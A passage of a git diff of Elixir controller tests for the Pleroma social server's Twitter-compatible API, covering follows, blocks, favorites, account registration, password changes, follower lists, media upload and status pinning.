	assert Enum.at(response, 0) == ActivityRepresenter.to_map(activity, %{user: user})

	conn =
	conn
	\|> get("/api/statuses/user_timeline.json", %{"user_id" => user.id, "include_rts" => "0"})

	response = json_response(conn, 200)

	assert length(response) == 1
	assert Enum.at(response, 0) == ActivityRepresenter.to_map(activity, %{user: user})
	end
	end

	describe "POST /friendships/create.json" do
	setup [:valid_user]

	test "without valid credentials", %{conn: conn} do
	conn = post(conn, "/api/friendships/create.json")
	assert json_response(conn, 403) == %{"error" => "Invalid credentials."}
	end

	test "with credentials", %{conn: conn, user: current_user} do
	followed = insert(:user)

	conn =
	conn
	\|> with_credentials(current_user.nickname, "test")
	\|> post("/api/friendships/create.json", %{user_id: followed.id})

	current_user = Repo.get(User, current_user.id)
	assert User.ap_followers(followed) in current_user.following

	assert json_response(conn, 200) ==
	UserView.render("show.json", %{user: followed, for: current_user})
	end
	end

	describe "POST /friendships/destroy.json" do
	setup [:valid_user]

	test "without valid credentials", %{conn: conn} do
	conn = post(conn, "/api/friendships/destroy.json")
	assert json_response(conn, 403) == %{"error" => "Invalid credentials."}
	end

	test "with credentials", %{conn: conn, user: current_user} do
	followed = insert(:user)

	{:ok, current_user} = User.follow(current_user, followed)
	assert User.ap_followers(followed) in current_user.following
	ActivityPub.follow(current_user, followed)

	conn =
	conn
	\|> with_credentials(current_user.nickname, "test")
	\|> post("/api/friendships/destroy.json", %{user_id: followed.id})

	current_user = Repo.get(User, current_user.id)
	assert current_user.following == [current_user.ap_id]

	assert json_response(conn, 200) ==
	UserView.render("show.json", %{user: followed, for: current_user})
	end
	end

	describe "POST /blocks/create.json" do
	setup [:valid_user]

	test "without valid credentials", %{conn: conn} do
	conn = post(conn, "/api/blocks/create.json")
	assert json_response(conn, 403) == %{"error" => "Invalid credentials."}
	end

	test "with credentials", %{conn: conn, user: current_user} do
	blocked = insert(:user)

	conn =
	conn
	\|> with_credentials(current_user.nickname, "test")
	\|> post("/api/blocks/create.json", %{user_id: blocked.id})

	current_user = Repo.get(User, current_user.id)
	assert User.blocks?(current_user, blocked)

	assert json_response(conn, 200) ==
	UserView.render("show.json", %{user: blocked, for: current_user})
	end
	end

	describe "POST /blocks/destroy.json" do
	setup [:valid_user]

	test "without valid credentials", %{conn: conn} do
	conn = post(conn, "/api/blocks/destroy.json")
	assert json_response(conn, 403) == %{"error" => "Invalid credentials."}
	end

	test "with credentials", %{conn: conn, user: current_user} do
	blocked = insert(:user)

	{:ok, current_user, blocked} = TwitterAPI.block(current_user, %{"user_id" => blocked.id})
	assert User.blocks?(current_user, blocked)

	conn =
	conn
	\|> with_credentials(current_user.nickname, "test")
	\|> post("/api/blocks/destroy.json", %{user_id: blocked.id})

	current_user = Repo.get(User, current_user.id)
	assert current_user.info.blocks == []

	assert json_response(conn, 200) ==
	UserView.render("show.json", %{user: blocked, for: current_user})
	end
	end

	describe "GET /help/test.json" do
	test "returns \"ok\"", %{conn: conn} do
	conn = get(conn, "/api/help/test.json")
	assert json_response(conn, 200) == "ok"
	end
	end

	describe "POST /api/qvitter/update_avatar.json" do
	setup [:valid_user]

	test "without valid credentials", %{conn: conn} do
	conn = post(conn, "/api/qvitter/update_avatar.json")
	assert json_response(conn, 403) == %{"error" => "Invalid credentials."}
	end

	test "with credentials", %{conn: conn, user: current_user} do
	avatar_image = File.read!("test/fixtures/avatar_data_uri")

	conn =
	conn
	\|> with_credentials(current_user.nickname, "test")
	\|> post("/api/qvitter/update_avatar.json", %{img: avatar_image})

	current_user = Repo.get(User, current_user.id)
	assert is_map(current_user.avatar)

	assert json_response(conn, 200) ==
	UserView.render("show.json", %{user: current_user, for: current_user})
	end
	end

	describe "GET /api/qvitter/mutes.json" do
	setup [:valid_user]

	test "unimplemented mutes without valid credentials", %{conn: conn} do
	conn = get(conn, "/api/qvitter/mutes.json")
	assert json_response(conn, 403) == %{"error" => "Invalid credentials."}
	end

	test "unimplemented mutes with credentials", %{conn: conn, user: current_user} do
	response =
	conn
	\|> with_credentials(current_user.nickname, "test")
	\|> get("/api/qvitter/mutes.json")
	\|> json_response(200)

	assert [] = response
	end
	end

	describe "POST /api/favorites/create/:id" do
	setup [:valid_user]

	test "without valid credentials", %{conn: conn} do
	note_activity = insert(:note_activity)
	conn = post(conn, "/api/favorites/create/#{note_activity.id}.json")
	assert json_response(conn, 403) == %{"error" => "Invalid credentials."}
	end

	test "with credentials", %{conn: conn, user: current_user} do
	note_activity = insert(:note_activity)

	conn =
	conn
	\|> with_credentials(current_user.nickname, "test")
	\|> post("/api/favorites/create/#{note_activity.id}.json")

	assert json_response(conn, 200)
	end

	test "with credentials, invalid param", %{conn: conn, user: current_user} do
	conn =
	conn
	\|> with_credentials(current_user.nickname, "test")
	\|> post("/api/favorites/create/wrong.json")

	assert json_response(conn, 400)
	end

	test "with credentials, invalid activity", %{conn: conn, user: current_user} do
	conn =
	conn
	\|> with_credentials(current_user.nickname, "test")
	\|> post("/api/favorites/create/1.json")

	assert json_response(conn, 500)
	end
	end

	describe "POST /api/favorites/destroy/:id" do
	setup [:valid_user]

	test "without valid credentials", %{conn: conn} do
	note_activity = insert(:note_activity)
	conn = post(conn, "/api/favorites/destroy/#{note_activity.id}.json")
	assert json_response(conn, 403) == %{"error" => "Invalid credentials."}
	end

	test "with credentials", %{conn: conn, user: current_user} do
	note_activity = insert(:note_activity)
	object = Object.get_by_ap_id(note_activity.data["object"]["id"])
	ActivityPub.like(current_user, object)

	conn =
	conn
	\|> with_credentials(current_user.nickname, "test")
	\|> post("/api/favorites/destroy/#{note_activity.id}.json")

	assert json_response(conn, 200)
	end
	end

	describe "POST /api/statuses/retweet/:id" do
	setup [:valid_user]

	test "without valid credentials", %{conn: conn} do
	note_activity = insert(:note_activity)
	conn = post(conn, "/api/statuses/retweet/#{note_activity.id}.json")
	assert json_response(conn, 403) == %{"error" => "Invalid credentials."}
	end

	test "with credentials", %{conn: conn, user: current_user} do
	note_activity = insert(:note_activity)

	request_path = "/api/statuses/retweet/#{note_activity.id}.json"

	response =
	conn
	\|> with_credentials(current_user.nickname, "test")
	\|> post(request_path)

	activity = Repo.get(Activity, note_activity.id)
	activity_user = Repo.get_by(User, ap_id: note_activity.data["actor"])

	assert json_response(response, 200) ==
	ActivityRepresenter.to_map(activity, %{user: activity_user, for: current_user})
	end
	end

	describe "POST /api/statuses/unretweet/:id" do
	setup [:valid_user]

	test "without valid credentials", %{conn: conn} do
	note_activity = insert(:note_activity)
	conn = post(conn, "/api/statuses/unretweet/#{note_activity.id}.json")
	assert json_response(conn, 403) == %{"error" => "Invalid credentials."}
	end

	test "with credentials", %{conn: conn, user: current_user} do
	note_activity = insert(:note_activity)

	request_path = "/api/statuses/retweet/#{note_activity.id}.json"

	_response =
	conn
	\|> with_credentials(current_user.nickname, "test")
	\|> post(request_path)

	request_path = String.replace(request_path, "retweet", "unretweet")

	response =
	conn
	\|> with_credentials(current_user.nickname, "test")
	\|> post(request_path)

	activity = Repo.get(Activity, note_activity.id)
	activity_user = Repo.get_by(User, ap_id: note_activity.data["actor"])

	assert json_response(response, 200) ==
	ActivityRepresenter.to_map(activity, %{user: activity_user, for: current_user})
	end
	end

	describe "POST /api/account/register" do
	test "it creates a new user", %{conn: conn} do
	data = %{
	"nickname" => "lain",
	"email" => "lain@wired.jp",
	"fullname" => "lain iwakura",
	"bio" => "close the world.",
	"password" => "bear",
	"confirm" => "bear"
	}

	conn =
	conn
	\|> post("/api/account/register", data)

	user = json_response(conn, 200)

	fetched_user = Repo.get_by(User, nickname: "lain")
	assert user == UserView.render("show.json", %{user: fetched_user})
	end

	test "it returns errors on a problem", %{conn: conn} do
	data = %{
	"email" => "lain@wired.jp",
	"fullname" => "lain iwakura",
	"bio" => "close the world.",
	"password" => "bear",
	"confirm" => "bear"
	}

	conn =
	conn
	\|> post("/api/account/register", data)

	errors = json_response(conn, 400)

	assert is_binary(errors["error"])
	end
	end

	describe "POST /api/account/password_reset, with valid parameters" do
	setup %{conn: conn} do
	user = insert(:user)
	conn = post(conn, "/api/account/password_reset?email=#{user.email}")
	%{conn: conn, user: user}
	end

	test "it returns 204", %{conn: conn} do
	assert json_response(conn, :no_content)
	end

	test "it creates a PasswordResetToken record for user", %{user: user} do
	token_record = Repo.get_by(Pleroma.PasswordResetToken, user_id: user.id)
	assert token_record
	end

	test "it sends an email to user", %{user: user} do
	token_record = Repo.get_by(Pleroma.PasswordResetToken, user_id: user.id)

	Swoosh.TestAssertions.assert_email_sent(
	Pleroma.UserEmail.password_reset_email(user, token_record.token)
	)
	end
	end

	describe "POST /api/account/password_reset, with invalid parameters" do
	setup [:valid_user]

	test "it returns 500 when user is not found", %{conn: conn, user: user} do
	conn = post(conn, "/api/account/password_reset?email=nonexisting_#{user.email}")
	assert json_response(conn, :internal_server_error)
	end

	test "it returns 500 when user is not local", %{conn: conn, user: user} do
	{:ok, user} = Repo.update(Changeset.change(user, local: false))
	conn = post(conn, "/api/account/password_reset?email=#{user.email}")
	assert json_response(conn, :internal_server_error)
	end
	end

	describe "GET /api/account/confirm_email/:id/:token" do
	setup do
	user = insert(:user)
	info_change = User.Info.confirmation_changeset(user.info, :unconfirmed)

	{:ok, user} =
	user
	\|> Changeset.change()
	\|> Changeset.put_embed(:info, info_change)
	\|> Repo.update()

	assert user.info.confirmation_pending

	[user: user]
	end

	test "it redirects to root url", %{conn: conn, user: user} do
	conn = get(conn, "/api/account/confirm_email/#{user.id}/#{user.info.confirmation_token}")

	assert 302 == conn.status
	end

	test "it confirms the user account", %{conn: conn, user: user} do
	get(conn, "/api/account/confirm_email/#{user.id}/#{user.info.confirmation_token}")

	user = Repo.get(User, user.id)

	refute user.info.confirmation_pending
	refute user.info.confirmation_token
	end

	test "it returns 500 if user cannot be found by id", %{conn: conn, user: user} do
	conn = get(conn, "/api/account/confirm_email/0/#{user.info.confirmation_token}")

	assert 500 == conn.status
	end

	test "it returns 500 if token is invalid", %{conn: conn, user: user} do
	conn = get(conn, "/api/account/confirm_email/#{user.id}/wrong_token")

	assert 500 == conn.status
	end
	end

	describe "POST /api/account/resend_confirmation_email" do
	setup do
	setting = Pleroma.Config.get([:instance, :account_activation_required])

	unless setting do
	Pleroma.Config.put([:instance, :account_activation_required], true)
	on_exit(fn -> Pleroma.Config.put([:instance, :account_activation_required], setting) end)
	end

	user = insert(:user)
	info_change = User.Info.confirmation_changeset(user.info, :unconfirmed)

	{:ok, user} =
	user
	\|> Changeset.change()
	\|> Changeset.put_embed(:info, info_change)
	\|> Repo.update()

	assert user.info.confirmation_pending

	[user: user]
	end

	test "it returns 204 No Content", %{conn: conn, user: user} do
	conn
	\|> assign(:user, user)
	\|> post("/api/account/resend_confirmation_email?email=#{user.email}")
	\|> json_response(:no_content)
	end

	test "it sends confirmation email", %{conn: conn, user: user} do
	conn
	\|> assign(:user, user)
	\|> post("/api/account/resend_confirmation_email?email=#{user.email}")

	Swoosh.TestAssertions.assert_email_sent(Pleroma.UserEmail.account_confirmation_email(user))
	end
	end

	describe "GET /api/externalprofile/show" do
	test "it returns the user", %{conn: conn} do
	user = insert(:user)
	other_user = insert(:user)

	conn =
	conn
	\|> assign(:user, user)
	\|> get("/api/externalprofile/show", %{profileurl: other_user.ap_id})

	assert json_response(conn, 200) == UserView.render("show.json", %{user: other_user})
	end
	end

	describe "GET /api/statuses/followers" do
	test "it returns a user's followers", %{conn: conn} do
	user = insert(:user)
	follower_one = insert(:user)
	follower_two = insert(:user)
	_not_follower = insert(:user)

	{:ok, follower_one} = User.follow(follower_one, user)
	{:ok, follower_two} = User.follow(follower_two, user)

	conn =
	conn
	\|> assign(:user, user)
	\|> get("/api/statuses/followers")

	expected = UserView.render("index.json", %{users: [follower_one, follower_two], for: user})
	result = json_response(conn, 200)
	assert Enum.sort(expected) == Enum.sort(result)
	end

	test "it returns 20 followers per page", %{conn: conn} do
	user = insert(:user)
	followers = insert_list(21, :user)

	Enum.each(followers, fn follower ->
	User.follow(follower, user)
	end)

	res_conn =
	conn
	\|> assign(:user, user)
	\|> get("/api/statuses/followers")

	result = json_response(res_conn, 200)
	assert length(result) == 20

	res_conn =
	conn
	\|> assign(:user, user)
	\|> get("/api/statuses/followers?page=2")

	result = json_response(res_conn, 200)
	assert length(result) == 1
	end

	test "it returns a given user's followers with user_id", %{conn: conn} do
	user = insert(:user)
	follower_one = insert(:user)
	follower_two = insert(:user)
	not_follower = insert(:user)

	{:ok, follower_one} = User.follow(follower_one, user)
	{:ok, follower_two} = User.follow(follower_two, user)

	conn =
	conn
	\|> assign(:user, not_follower)
	\|> get("/api/statuses/followers", %{"user_id" => user.id})

	assert MapSet.equal?(
	MapSet.new(json_response(conn, 200)),
	MapSet.new(
	UserView.render("index.json", %{
	users: [follower_one, follower_two],
	for: not_follower
	})
	)
	)
	end

	test "it returns empty for a hidden network", %{conn: conn} do
	user = insert(:user, %{info: %{hide_network: true}})
	follower_one = insert(:user)
	follower_two = insert(:user)
	not_follower = insert(:user)

	{:ok, _follower_one} = User.follow(follower_one, user)
	{:ok, _follower_two} = User.follow(follower_two, user)

	response =
	conn
	\|> assign(:user, not_follower)
	\|> get("/api/statuses/followers", %{"user_id" => user.id})
	\|> json_response(200)

	assert [] == response
	end

	test "it returns the followers for a hidden network if requested by the user themselves", %{
	conn: conn
	} do
	user = insert(:user, %{info: %{hide_network: true}})
	follower_one = insert(:user)
	follower_two = insert(:user)
	_not_follower = insert(:user)

	{:ok, _follower_one} = User.follow(follower_one, user)
	{:ok, _follower_two} = User.follow(follower_two, user)

	conn =
	conn
	\|> assign(:user, user)
	\|> get("/api/statuses/followers", %{"user_id" => user.id})

	refute [] == json_response(conn, 200)
	end
	end

	describe "GET /api/statuses/blocks" do
	test "it returns the list of users blocked by requester", %{conn: conn} do
	user = insert(:user)
	other_user = insert(:user)

	{:ok, user} = User.block(user, other_user)

	conn =
	conn
	\|> assign(:user, user)
	\|> get("/api/statuses/blocks")

	expected = UserView.render("index.json", %{users: [other_user], for: user})
	result = json_response(conn, 200)
	assert Enum.sort(expected) == Enum.sort(result)
	end
	end

	describe "GET /api/statuses/friends" do
	test "it returns the logged in user's friends", %{conn: conn} do
	user = insert(:user)
	followed_one = insert(:user)
	followed_two = insert(:user)
	_not_followed = insert(:user)

	{:ok, user} = User.follow(user, followed_one)
	{:ok, user} = User.follow(user, followed_two)

	conn =
	conn
	\|> assign(:user, user)
	\|> get("/api/statuses/friends")

	expected = UserView.render("index.json", %{users: [followed_one, followed_two], for: user})
	result = json_response(conn, 200)
	assert Enum.sort(expected) == Enum.sort(result)
	end

	test "it returns 20 friends per page", %{conn: conn} do
	user = insert(:user)
	followeds = insert_list(21, :user)

	{:ok, user} =
	Enum.reduce(followeds, {:ok, user}, fn followed, {:ok, user} ->
	User.follow(user, followed)
	end)

	res_conn =
	conn
	\|> assign(:user, user)
	\|> get("/api/statuses/friends")

	result = json_response(res_conn, 200)
	assert length(result) == 20

	res_conn =
	conn
	\|> assign(:user, user)
	\|> get("/api/statuses/friends", %{page: 2})

	result = json_response(res_conn, 200)
	assert length(result) == 1
	end

	test "it returns a given user's friends with user_id", %{conn: conn} do
	user = insert(:user)
	followed_one = insert(:user)
	followed_two = insert(:user)
	_not_followed = insert(:user)

	{:ok, user} = User.follow(user, followed_one)
	{:ok, user} = User.follow(user, followed_two)

	conn =
	conn
	\|> assign(:user, user)
	\|> get("/api/statuses/friends", %{"user_id" => user.id})

	assert MapSet.equal?(
	MapSet.new(json_response(conn, 200)),
	MapSet.new(
	UserView.render("index.json", %{users: [followed_one, followed_two], for: user})
	)
	)
	end

	test "it returns empty for a hidden network", %{conn: conn} do
	user = insert(:user, %{info: %{hide_network: true}})
	followed_one = insert(:user)
	followed_two = insert(:user)
	not_followed = insert(:user)

	{:ok, user} = User.follow(user, followed_one)
	{:ok, user} = User.follow(user, followed_two)

	conn =
	conn
	\|> assign(:user, not_followed)
	\|> get("/api/statuses/friends", %{"user_id" => user.id})

	assert [] == json_response(conn, 200)
	end

	test "it returns friends for a hidden network if the user themselves request it", %{
	conn: conn
	} do
	user = insert(:user, %{info: %{hide_network: true}})
	followed_one = insert(:user)
	followed_two = insert(:user)
	_not_followed = insert(:user)

	{:ok, _user} = User.follow(user, followed_one)
	{:ok, _user} = User.follow(user, followed_two)

	response =
	conn
	\|> assign(:user, user)
	\|> get("/api/statuses/friends", %{"user_id" => user.id})
	\|> json_response(200)

	refute [] == response
	end

	test "it returns a given user's friends with screen_name", %{conn: conn} do
	user = insert(:user)
	followed_one = insert(:user)
	followed_two = insert(:user)
	_not_followed = insert(:user)

	{:ok, user} = User.follow(user, followed_one)
	{:ok, user} = User.follow(user, followed_two)

	conn =
	conn
	\|> assign(:user, user)
	\|> get("/api/statuses/friends", %{"screen_name" => user.nickname})

	assert MapSet.equal?(
	MapSet.new(json_response(conn, 200)),
	MapSet.new(
	UserView.render("index.json", %{users: [followed_one, followed_two], for: user})
	)
	)
	end
	end

	describe "GET /friends/ids" do
	test "it returns a user's friends", %{conn: conn} do
	user = insert(:user)
	followed_one = insert(:user)
	followed_two = insert(:user)
	_not_followed = insert(:user)

	{:ok, user} = User.follow(user, followed_one)
	{:ok, user} = User.follow(user, followed_two)

	conn =
	conn
	\|> assign(:user, user)
	\|> get("/api/friends/ids")

	expected = [followed_one.id, followed_two.id]

	assert MapSet.equal?(
	MapSet.new(Poison.decode!(json_response(conn, 200))),
	MapSet.new(expected)
	)
	end
	end

	describe "POST /api/account/update_profile.json" do
	test "it updates a user's profile", %{conn: conn} do
	user = insert(:user)
	user2 = insert(:user)

	conn =
	conn
	\|> assign(:user, user)
	\|> post("/api/account/update_profile.json", %{
	"name" => "new name",
	"description" => "hi @#{user2.nickname}"
	})

	user = Repo.get!(User, user.id)
	assert user.name == "new name"

	assert user.bio ==
	- "hi <span><a data-user='#{user2.id}' class='mention' href='#{user2.ap_id}'>@<span>#{
	- user2.nickname
	- }</span></a></span>"
	+ "hi <span class='h-card'><a data-user='#{user2.id}' class='u-url mention' href='#{
	+ user2.ap_id
	+ }'>@<span>#{user2.nickname}</span></a></span>"

	assert json_response(conn, 200) == UserView.render("user.json", %{user: user, for: user})
	end

	test "it sets and un-sets hide_network", %{conn: conn} do
	user = insert(:user)

	conn
	\|> assign(:user, user)
	\|> post("/api/account/update_profile.json", %{
	"hide_network" => "true"
	})

	user = Repo.get!(User, user.id)
	assert user.info.hide_network == true

	conn =
	conn
	\|> assign(:user, user)
	\|> post("/api/account/update_profile.json", %{
	"hide_network" => "false"
	})

	user = Repo.get!(User, user.id)
	assert user.info.hide_network == false
	assert json_response(conn, 200) == UserView.render("user.json", %{user: user, for: user})
	end

	test "it locks an account", %{conn: conn} do
	user = insert(:user)

	conn =
	conn
	\|> assign(:user, user)
	\|> post("/api/account/update_profile.json", %{
	"locked" => "true"
	})

	user = Repo.get!(User, user.id)
	assert user.info.locked == true

	assert json_response(conn, 200) == UserView.render("user.json", %{user: user, for: user})
	end

	test "it unlocks an account", %{conn: conn} do
	user = insert(:user)

	conn =
	conn
	\|> assign(:user, user)
	\|> post("/api/account/update_profile.json", %{
	"locked" => "false"
	})

	user = Repo.get!(User, user.id)
	assert user.info.locked == false

	assert json_response(conn, 200) == UserView.render("user.json", %{user: user, for: user})
	end
	end

	defp valid_user(_context) do
	user = insert(:user)
	[user: user]
	end

	defp with_credentials(conn, username, password) do
	header_content = "Basic " <> Base.encode64("#{username}:#{password}")
	put_req_header(conn, "authorization", header_content)
	end

	describe "GET /api/search.json" do
	test "it returns search results", %{conn: conn} do
	user = insert(:user)
	user_two = insert(:user, %{nickname: "shp@shitposter.club"})

	{:ok, activity} = CommonAPI.post(user, %{"status" => "This is about 2hu"})
	{:ok, _} = CommonAPI.post(user_two, %{"status" => "This isn't"})

	conn =
	conn
	\|> get("/api/search.json", %{"q" => "2hu", "page" => "1", "rpp" => "1"})

	assert [status] = json_response(conn, 200)
	assert status["id"] == activity.id
	end
	end

	describe "GET /api/statusnet/tags/timeline/:tag.json" do
	test "it returns the tags timeline", %{conn: conn} do
	user = insert(:user)
	user_two = insert(:user, %{nickname: "shp@shitposter.club"})

	{:ok, activity} = CommonAPI.post(user, %{"status" => "This is about #2hu"})
	{:ok, _} = CommonAPI.post(user_two, %{"status" => "This isn't"})

	conn =
	conn
	\|> get("/api/statusnet/tags/timeline/2hu.json")

	assert [status] = json_response(conn, 200)
	assert status["id"] == activity.id
	end
	end

	test "Convert newlines to <br> in bio", %{conn: conn} do
	user = insert(:user)

	_conn =
	conn
	\|> assign(:user, user)
	\|> post("/api/account/update_profile.json", %{
	"description" => "Hello,\r\nWorld! I\n am a test."
	})

	user = Repo.get!(User, user.id)
	assert user.bio == "Hello,<br>World! I<br> am a test."
	end

	describe "POST /api/pleroma/change_password" do
	setup [:valid_user]

	test "without credentials", %{conn: conn} do
	conn = post(conn, "/api/pleroma/change_password")
	assert json_response(conn, 403) == %{"error" => "Invalid credentials."}
	end

	test "with credentials and invalid password", %{conn: conn, user: current_user} do
	conn =
	conn
	\|> with_credentials(current_user.nickname, "test")
	\|> post("/api/pleroma/change_password", %{
	"password" => "hi",
	"new_password" => "newpass",
	"new_password_confirmation" => "newpass"
	})

	assert json_response(conn, 200) == %{"error" => "Invalid password."}
	end

	test "with credentials, valid password and new password and confirmation not matching", %{
	conn: conn,
	user: current_user
	} do
	conn =
	conn
	\|> with_credentials(current_user.nickname, "test")
	\|> post("/api/pleroma/change_password", %{
	"password" => "test",
	"new_password" => "newpass",
	"new_password_confirmation" => "notnewpass"
	})

	assert json_response(conn, 200) == %{
	"error" => "New password does not match confirmation."
	}
	end

	test "with credentials, valid password and invalid new password", %{
	conn: conn,
	user: current_user
	} do
	conn =
	conn
	\|> with_credentials(current_user.nickname, "test")
	\|> post("/api/pleroma/change_password", %{
	"password" => "test",
	"new_password" => "",
	"new_password_confirmation" => ""
	})

	assert json_response(conn, 200) == %{
	"error" => "New password can't be blank."
	}
	end

	test "with credentials, valid password and matching new password and confirmation", %{
	conn: conn,
	user: current_user
	} do
	conn =
	conn
	\|> with_credentials(current_user.nickname, "test")
	\|> post("/api/pleroma/change_password", %{
	"password" => "test",
	"new_password" => "newpass",
	"new_password_confirmation" => "newpass"
	})

	assert json_response(conn, 200) == %{"status" => "success"}
	fetched_user = Repo.get(User, current_user.id)
	assert Pbkdf2.checkpw("newpass", fetched_user.password_hash) == true
	end
	end

	describe "POST /api/pleroma/delete_account" do
	setup [:valid_user]

	test "without credentials", %{conn: conn} do
	conn = post(conn, "/api/pleroma/delete_account")
	assert json_response(conn, 403) == %{"error" => "Invalid credentials."}
	end

	test "with credentials and invalid password", %{conn: conn, user: current_user} do
	conn =
	conn
	\|> with_credentials(current_user.nickname, "test")
	\|> post("/api/pleroma/delete_account", %{"password" => "hi"})

	assert json_response(conn, 200) == %{"error" => "Invalid password."}
	end

	test "with credentials and valid password", %{conn: conn, user: current_user} do
	conn =
	conn
	\|> with_credentials(current_user.nickname, "test")
	\|> post("/api/pleroma/delete_account", %{"password" => "test"})

	assert json_response(conn, 200) == %{"status" => "success"}
	# Wait a second for the started task to end
	:timer.sleep(1000)
	end
	end

	describe "GET /api/pleroma/friend_requests" do
	test "it lists friend requests" do
	user = insert(:user)
	other_user = insert(:user)

	{:ok, _activity} = ActivityPub.follow(other_user, user)

	user = Repo.get(User, user.id)
	other_user = Repo.get(User, other_user.id)

	assert User.following?(other_user, user) == false

	conn =
	build_conn()
	\|> assign(:user, user)
	\|> get("/api/pleroma/friend_requests")

	assert [relationship] = json_response(conn, 200)
	assert other_user.id == relationship["id"]
	end
	end

	describe "POST /api/pleroma/friendships/approve" do
	test "it approves a friend request" do
	user = insert(:user)
	other_user = insert(:user)

	{:ok, _activity} = ActivityPub.follow(other_user, user)

	user = Repo.get(User, user.id)
	other_user = Repo.get(User, other_user.id)

	assert User.following?(other_user, user) == false

	conn =
	build_conn()
	\|> assign(:user, user)
	\|> post("/api/pleroma/friendships/approve", %{"user_id" => to_string(other_user.id)})

	assert relationship = json_response(conn, 200)
	assert other_user.id == relationship["id"]
	assert relationship["follows_you"] == true
	end
	end

	describe "POST /api/pleroma/friendships/deny" do
	test "it denies a friend request" do
	user = insert(:user)
	other_user = insert(:user)

	{:ok, _activity} = ActivityPub.follow(other_user, user)

	user = Repo.get(User, user.id)
	other_user = Repo.get(User, other_user.id)

	assert User.following?(other_user, user) == false

	conn =
	build_conn()
	\|> assign(:user, user)
	\|> post("/api/pleroma/friendships/deny", %{"user_id" => to_string(other_user.id)})

	assert relationship = json_response(conn, 200)
	assert other_user.id == relationship["id"]
	assert relationship["follows_you"] == false
	end
	end

	describe "GET /api/pleroma/search_user" do
	test "it returns users, ordered by similarity", %{conn: conn} do
	user = insert(:user, %{name: "eal"})
	user_two = insert(:user, %{name: "ean"})
	user_three = insert(:user, %{name: "ebn"})

	resp =
	conn
	\|> get(twitter_api_search__path(conn, :search_user), query: "eal")
	\|> json_response(200)

	assert length(resp) == 3
	assert [user.id, user_two.id, user_three.id] == Enum.map(resp, fn %{"id" => id} -> id end)
	end
	end

	describe "POST /api/media/upload" do
	setup context do
	Pleroma.DataCase.ensure_local_uploader(context)
	end

	test "it performs the upload and sets `data[actor]` with AP id of uploader user", %{
	conn: conn
	} do
	user = insert(:user)

	upload_filename = "test/fixtures/image_tmp.jpg"
	File.cp!("test/fixtures/image.jpg", upload_filename)

	file = %Plug.Upload{
	content_type: "image/jpg",
	path: Path.absname(upload_filename),
	filename: "image.jpg"
	}

	response =
	conn
	\|> assign(:user, user)
	\|> put_req_header("content-type", "application/octet-stream")
	\|> post("/api/media/upload", %{
	"media" => file
	})
	\|> json_response(:ok)

	assert response["media_id"]
	object = Repo.get(Object, response["media_id"])
	assert object
	assert object.data["actor"] == User.ap_id(user)
	end
	end

	describe "POST /api/media/metadata/create" do
	setup do
	object = insert(:note)
	user = User.get_by_ap_id(object.data["actor"])
	%{object: object, user: user}
	end

	test "it returns :forbidden status on attempt to modify someone else's upload", %{
	conn: conn,
	object: object
	} do
	initial_description = object.data["name"]
	another_user = insert(:user)

	conn
	\|> assign(:user, another_user)
	\|> post("/api/media/metadata/create", %{"media_id" => object.id})
	\|> json_response(:forbidden)

	object = Repo.get(Object, object.id)
	assert object.data["name"] == initial_description
	end

	test "it updates `data[name]` of referenced Object with provided value", %{
	conn: conn,
	object: object,
	user: user
	} do
	description = "Informative description of the image. Initial value: #{object.data["name"]}}"

	conn
	\|> assign(:user, user)
	\|> post("/api/media/metadata/create", %{
	"media_id" => object.id,
	"alt_text" => %{"text" => description}
	})
	\|> json_response(:no_content)

	object = Repo.get(Object, object.id)
	assert object.data["name"] == description
	end
	end

	describe "POST /api/statuses/user_timeline.json?user_id=:user_id&pinned=true" do
	test "it returns a list of pinned statuses", %{conn: conn} do
	Pleroma.Config.put([:instance, :max_pinned_statuses], 1)

	user = insert(:user, %{name: "egor"})
	{:ok, %{id: activity_id}} = CommonAPI.post(user, %{"status" => "HI!!!"})
	{:ok, _} = CommonAPI.pin(activity_id, user)

	resp =
	conn
	\|> get("/api/statuses/user_timeline.json", %{user_id: user.id, pinned: true})
	\|> json_response(200)

	assert length(resp) == 1
	assert [%{"id" => ^activity_id, "pinned" => true}] = resp
	end
	end

	describe "POST /api/statuses/pin/:id" do
	setup do
	Pleroma.Config.put([:instance, :max_pinned_statuses], 1)
	[user: insert(:user)]
	end

	test "without valid credentials", %{conn: conn} do
	note_activity = insert(:note_activity)
	conn = post(conn, "/api/statuses/pin/#{note_activity.id}.json")
	assert json_response(conn, 403) == %{"error" => "Invalid credentials."}
	end

	test "with credentials", %{conn: conn, user: user} do
	{:ok, activity} = CommonAPI.post(user, %{"status" => "test!"})

	request_path = "/api/statuses/pin/#{activity.id}.json"

	response =
	conn
	\|> with_credentials(user.nickname, "test")
	\|> post(request_path)

	user = refresh_record(user)

	assert json_response(response, 200) == ActivityRepresenter.to_map(activity, %{user: user})
	end
	end

	describe "POST /api/statuses/unpin/:id" do
	setup do
	Pleroma.Config.put([:instance, :max_pinned_statuses], 1)
	[user: insert(:user)]
	end

	test "without valid credentials", %{conn: conn} do
	note_activity = insert(:note_activity)
	conn = post(conn, "/api/statuses/unpin/#{note_activity.id}.json")
	assert json_response(conn, 403) == %{"error" => "Invalid credentials."}
	end

	test "with credentials", %{conn: conn, user: user} do
	{:ok, activity} = CommonAPI.post(user, %{"status" => "test!"})
	{:ok, activity} = CommonAPI.pin(activity.id, user)

	request_path = "/api/statuses/unpin/#{activity.id}.json"

	response =
	conn
	\|> with_credentials(user.nickname, "test")
	\|> post(request_path)

	user = refresh_record(user)

	assert json_response(response, 200) == ActivityRepresenter.to_map(activity, %{user: user})
	end
	end
	end
	diff --git a/test/web/twitter_api/twitter_api_test.exs b/test/web/twitter_api/twitter_api_test.exs
	index b9feb23d4..547592ff2 100644
	--- a/test/web/twitter_api/twitter_api_test.exs
	+++ b/test/web/twitter_api/twitter_api_test.exs
	@@ -1,457 +1,457 @@
	# Pleroma: A lightweight social networking server
	# Copyright © 2017-2018 Pleroma Authors <https://pleroma.social/>
	# SPDX-License-Identifier: AGPL-3.0-only

	defmodule Pleroma.Web.TwitterAPI.TwitterAPITest do
	use Pleroma.DataCase
	alias Pleroma.Web.TwitterAPI.{TwitterAPI, UserView}
	alias Pleroma.{Activity, User, Object, Repo, UserInviteToken}
	alias Pleroma.Web.ActivityPub.ActivityPub
	alias Pleroma.Web.TwitterAPI.ActivityView

	import Pleroma.Factory

	test "create a status" do
	user = insert(:user)
	mentioned_user = insert(:user, %{nickname: "shp", ap_id: "shp"})

	object_data = %{
	"type" => "Image",
	"url" => [
	%{
	"type" => "Link",
	"mediaType" => "image/jpg",
	"href" => "http://example.org/image.jpg"
	}
